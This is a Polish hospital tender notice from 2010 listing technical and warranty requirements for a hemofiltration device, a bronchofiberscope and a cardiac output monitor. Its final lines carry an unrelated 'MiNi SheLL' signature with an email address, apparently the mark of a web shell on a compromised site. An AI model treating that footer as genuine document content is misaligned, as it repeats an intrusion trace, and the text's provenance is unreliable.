<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.12.2010 godzina 11:00, miejsce: KANCELARIA 5 WOJSKOWEGO SZPITALA KLINICZNEGO SP ZOZ ( BUDYNEK KOMENDY) UL. WROCŁAWSKA 1-3; 30-901 KRAKÓW.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Aparat do hemofiltracji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.P.	FUNKCJA PARAMETR	WARUNEK GRANICZNY	

J.M.	
PARAMETRY 
OFEROWANE
1.	Aparat do hemofiltracji	TAK	1 szt.	
1.1	Hemofiltracja (cvvh)
	TAK		
1.2	Wolna ultrafiltracja (scuf)
	TAK		
1.3	Hemodializa (cvvhd)
	TAK		
1.4	Hemodiafiltracja (cvvhdf)
	TAK		
1.5	Wysokoobjętościowa hemofiltracja (hv-hf)
	TAK		
1.6	Plazmafereza (pf)
	TAK		
1.7	Hemoperfuzja (hp)
	TAK		
1.8	Komunikacja w języku polskim na ekranie
	TAK		
1.9	Zasilanie awaryjne na min. 15 min.
	TAK		
1.10	Zintegrowana pompa strzykawka 50 ml
	TAK		
1.11	Pomoc kontekstowa
	TAK		
1.12	System bilansujący grawimetryczny
	TAK		
1.13	Minimum trzy wagi: substytutu,
dializatu, filtratu
	TAK		
1.14	Dokładność ważenia 1 g
	TAK		
1.15	Pobór substytutu z 4 worków po 5l jednocześnie
	TAK		
1.16	Wydajność pompy krwi do  500 ml - min.
	TAK		
1.17	Pomiary ciśnienia dostępu, powrotu, przed hemofiltrem, filtratu 
	TAK		
1.18	Zakres ciśnienia przed hemofiltrem  
0 - 750 mmhg
	TAK		
1.19	Regulacja temperatury substytutu- dializatu dla pełnego zakresu oferowanych przepływów 
(35 - 39)°c
	TAK		
1.20	Możliwość wyłączenia ogrzewania płynów
	TAK		
1.21	Detektor przecieku krwi
	TAK		
1.22	Dwa niezależne detektory powietrza
	TAK		
1.23	Możliwość wymiany drenu żylnego w trakcie zabiegu
	TAK		
1.24	Dwie pulapki powietrza przed i za hemofiltrem
	TAK		
1.25	Niezależnie odpowietrzanie substytutu, dializatu, filtratu 
	TAK		
1.26	Przepływ substytutu do 160 ml- min.
	TAK		
1.27	Moduł cytrynian-wapń
	TAK		
1.28	cvvhd z regionalną antykoag. cytrynianową
	TAK		
2.	Wyposażenie	TAK		
2.1	Zestaw do dializy cytrynianowej	TAK	3 szt.	
2.2	Worek na filtry	TAK	6 szt.	
2.3	Cewnik silikonowy dwukanałowy 11,5 F 15 cm	TAK		
2.4	Cewnik silikonowy dwukanałowy 11,5 F 24 cm	TAK		
2.5	Dializat bez wapniowy 	TAK	90 worków	
2.6	4 procentowy cytrynian sodu 	TAK	42 worki	
2.7	46,7 procentowy cytrynian sodu amp. 5 ml 
	TAK	1 opak	
2.8	Rozdzielacz 2x4	TAK	3 szt.	
3.	Inne	TAK		
3.1	 Oświadczenie potwierdzające dopuszczenie do używania na terenie RP zgodnie z Ustawą o Wyrobach Medycznych	TAK		
3.2	Dołączyć folder wraz z opisem	TAK		
3.3	Instrukcja obsługi i opis techniczny  w języku polskim  przy dostawie	TAK		




               II.   OPIS PRZEDMIOTU ZAMÓWIENIA -ZESTAWIENIE WARUNKÓW GRANICZNYCH GWARANCJI 
L.p.	
PARAMETR	WARUNEK GRANICZNY	WARUNEK OFEROWANY
A.	OKRES GWARANCJI		
1.		Okres pełnej bezpłatnej gwarancji  [miesiące]	min. 24 miesiące	PODAĆ  ILE
2.		Czas reakcji na zgłoszoną awarię [godz.]	max. 48 godzin	PODAĆ  ILE
3.		Każda naprawa gwarancyjna powoduje przedłużenie okresu gwarancji o czas naprawy 	TAK	
4.		Liczba bezpłatnych przeglądów w czasie gwarancji 	Dwa	PODAĆ  ILE
5.		Na czas naprawy wykonawca dostarczy w ciągu max. 72 godzin urządzenie zastępcze w przypadku naprawy trwającej powyżej 10 dni	TAK	
6.		Koszt transportu uszkodzonego elementu urządzenia lub urządzenia podlegającego naprawie lub wymianie do i z punktu serwisowego pokrywa Wykonawca	TAK	
	
B.	SERWIS POGWARANCYJNY	
1.		Okres zagwarantowania dostępności części zamiennych oraz materiałów zużywalnych od daty podpisania protokołu odbioru technicznego [w latach ].	min. 8 lat	PODAĆ  ILE
2.		Okres gwarancji dla nowo zainstalowanych elementów po naprawie	min.6 miesięcy	PODAĆ  ILE
3.		Inne		PODAĆ  JEŚLI  WYSTĘPUJĄ
C.	SZKOLENIA	
1.		Personel medyczny i techniczny	TAK	
2.		Inne 		PODAĆ  JEŚLI  WYSTĘPUJĄ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.18.10.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Bronchofiberoskop giętki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.P.	FUNKCJA PARAMETR	WARUNEK GRANICZNY	

J.M.	
PARAMETRY 
OFEROWANE
1.	Bronchofiberoskop giętki		1 szt.	
1.1	Średnica zewnętrzna  max . 5,2 mm	TAK		
1.2	Głębia ostrości min. 4- 50 mm	TAK		
1.3	Długość robocza min. 600 mm	TAK		
1.4	Kanał roboczy 2,6 mm	TAK		
1.5	Pole widzenia min. 90	TAK		
1.6	Zgięcie końcówki min. 180 -130 	TAK		
1.7	Wbudowane źródło światła - dioda LED	TAK		
1.8	Monitor LCD o przekątnej min. 2,5TAK		
1.9	Regulacja monitora 0-120	TAK		
1.10	Ekran obrotowy- prawo-lewo, góra-dół	TAK		
1.11	Funkcja zapisywania nieruchomych obrazów i filmów w wewnętrznej pamięci lub na karcie pamięci min. 1GB	TAK		
1.12	Format zapisu video- MJPEG	TAK		
2.	Dodatkowe wyposażenie	TAK		
2.1	Oprogramowanie Endo-Base do archiwizacji badań endoskopowych na dwa stanowiska	TAK		
2.2	Szczoteczka do biopsji mikrobiologicznej	TAK	50 szt	
2.3	Zaworki biopsyjne wielorazowe	TAK	10 szt	
2.4	Szczotka do gniazda biopsyjnego wielorazowa	TAK	1 szt.	
2.5	Szczoteczki jednorazowe do czyszczenia	TAK	50 szt	
2.6	Wieszak na endoskopy	TAK	1 szt	
2.7	Ładowarka  + dwa akumulatory?	TAK	1 kpl.	
3.	Inne	TAK		
3.1	Oświadczenie potwierdzające dopuszczenie do używania na terenie RP zgodnie z Ustawą o Wyrobach Medycznych	TAK		
3.2	Dołączyć folder wraz z opisem	TAK		
3.3	Instrukcja obsługi i opis techniczny  w języku polskim  przy dostawie	TAK		


               II.   OPIS PRZEDMIOTU ZAMÓWIENIA -ZESTAWIENIE WARUNKÓW GRANICZNYCH GWARANCJI 
L.p.	
PARAMETR	WARUNEK GRANICZNY	WARUNEK OFEROWANY
D.	OKRES GWARANCJI		
7.		Okres pełnej bezpłatnej gwarancji  [miesiące]	min. 24 miesiące	PODAĆ  ILE
8.		Czas reakcji na zgłoszoną awarię [godz.]	max. 48 godzin	PODAĆ  ILE
9.		Każda naprawa gwarancyjna powoduje przedłużenie okresu gwarancji o czas naprawy 	TAK	
10.		Liczba bezpłatnych przeglądów w czasie gwarancji 	dwa	PODAĆ  ILE
11.		Na czas naprawy wykonawca dostarczy w ciągu max. 72 godzin urządzenie zastępcze	TAK	
12.		Koszt transportu uszkodzonego elementu urządzenia lub urządzenia podlegającego naprawie lub wymianie do i z punktu serwisowego pokrywa Wykonawca	TAK	
	
E.	SERWIS POGWARANCYJNY	
4.		Okres zagwarantowania dostępności części zamiennych oraz materiałów zużywalnych od daty podpisania protokołu odbioru technicznego [w latach ].	min. 10 lat	PODAĆ  ILE
5.		Okres gwarancji dla nowo zainstalowanych elementów po naprawie	min.6 miesięcy	PODAĆ  ILE
6.		Inne		PODAĆ  JEŚLI  WYSTĘPUJĄ
F.	SZKOLENIA	
3.		Personel medyczny i techniczny	TAK	
4.		Inne 		PODAĆ  JEŚLI  WYSTĘPUJĄ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.16.81.10-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Monitor rzutu minutowego serca.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.P.	FUNKCJA/PARAMETR	WARUNEK GRANICZNY	

J.M.	
PARAMETRY 
OFEROWANE
1.	Monitor rzutu minutowego serca	TAK	1 szt.	
1.1	Parametry monitorowane:	TAK		
1.2	Rzut serca (CO);	TAK		
1.3	Objętość wyrzutowa (SV);	TAK		
1.4	Systemowy (obwodowy) opór naczyniowy (SVR);	TAK		
1.5	Zmienność objętości wyrzutowej (SVV);	TAK		
1.6	Saturacja w żyle głównej (ScvO2);	TAK		
1.7	Saturacji mieszanej krwi żylnej (SvO2);	TAK		
1.8	Możliwość podawania parametrów w postaci indeksowanej:	TAK		
1.9	Indeks sercowy (CI);	TAK		
1.10	Indeks objętości wyrzutowej (SVI);	TAK		
1.11	Indeks systemowego (obwodowego) oporu naczyniowego (SVRI)	TAK		
1.12	Prezentacja danych w postaci:	TAK		
1.13	Trendów graficznych;	TAK		
1.14	Trendów tabelarycznych;	TAK		
1.15	Wartości cyfrowych	TAK		
1.16	Możliwość kalkulacji dodatkowych parametrów:	TAK		
1.17	Tlen dostarczony (DO2);	TAK		
1.18	Indeks tlenu dostarczonego (DO2I)	TAK		
1.19	Maksymalnie jeden dostęp naczyniowy niezbędny do uzyskania pomiarów hemodynamicznych pacjenta, takich jak np.: CCO, SV, SVV	TAK		
1.20	Brak konieczności kalibracji systemu, przy pomiarach hemodynamicznych	TAK		
1.21	Możliwość przekazywania danych do zewnętrznego urządzenia (komputer, monitor przyłóżkowy)	TAK		
1.22	Płytka umożliwiająca umocowanie monitora do stojaka (kolumny)	TAK		
1.23	Waga aparatu poniżej 5 kg	TAK		
1.24	Menu w języku polskim	TAK		
1.25	Pamięć trendów min. 72 godz.	TAK		
1.26	Zasilanie sieciowe 230V ,50Hz	TAK		
2.	Linia pomiarowa do monitora rzutu serca 	TAK	15 szt.	
2.1	Czujnik  do ciągłego pomiaru rzutu serca:	TAK		
2.2	Długość linii 152 cm, 	TAK		
2.3	Dwa niezależne gniazda sygnału ciśnienia	TAK		
2.4	Połączenia gniazd sygnału ciśnienia - bezpinowe	TAK		
2.5	Brak konieczności kalibracji czujnika	TAK		
2.6	Częstotliwość własna czujnika > 200 Hz	TAK		
2.7	Szybkość przepływu w urządzeniu płuczącym przy ciśnieniu w worku i.v. do 300 mm Hg - 3 ml/godz.	TAK		
2.8	Metoda pomiaru rzutu minutowego małoinwazyjna (max 1 dostęp naczyniowy)	TAK		
2.9	Zestaw linii pomiarowych musi być kompatybilny z oferowanym monitorem.	TAK		
3.	Inne	TAK		
3.1	Oświadczenie potwierdzające dopuszczenie do używania na terenie RP zgodnie z Ustawą o Wyrobach Medycznych	TAK		
3.2	Dołączyć folder wraz z opisem	TAK		
3.3	Instrukcja obsługi i opis techniczny  w języku polskim  przy dostawie	TAK		








               II.   OPIS PRZEDMIOTU ZAMÓWIENIA -ZESTAWIENIE WARUNKÓW GRANICZNYCH GWARANCJI 
L.p.	
PARAMETR	WARUNEK GRANICZNY	WARUNEK OFEROWANY
G.	OKRES GWARANCJI		
13.		Okres pełnej bezpłatnej gwarancji  [miesiące]	min. 24 miesiące	PODAĆ  ILE
14.		Czas reakcji na zgłoszoną awarię [godz.] dni robocze	max. 48 godzin	PODAĆ  ILE
15.		Każda naprawa gwarancyjna powoduje przedłużenie okresu gwarancji o czas naprawy 	TAK	
16.		Liczba bezpłatnych przeglądów w czasie gwarancji 	Dwa	PODAĆ  ILE
17.		Na czas naprawy wykonawca dostarczy w ciągu max. 72 godzin urządzenie zastępcze	TAK	
18.		Koszt transportu uszkodzonego elementu urządzenia lub urządzenia podlegającego naprawie lub wymianie do i z punktu serwisowego pokrywa Wykonawca	TAK	
	
H.	SERWIS POGWARANCYJNY	
7.		Okres zagwarantowania dostępności części zamiennych oraz materiałów zużywalnych od daty podpisania protokołu odbioru technicznego [w latach ].	min. 10 lat	PODAĆ  ILE
8.		Okres gwarancji dla nowo zainstalowanych elementów po naprawie	min.6 miesięcy	PODAĆ  ILE
9.		Inne		PODAĆ  JEŚLI  WYSTĘPUJĄ
I.	SZKOLENIA	
5.		Personel medyczny i techniczny	TAK	
6.		Inne 		PODAĆ  JEŚLI  WYSTĘPUJĄ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.12.32.10-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com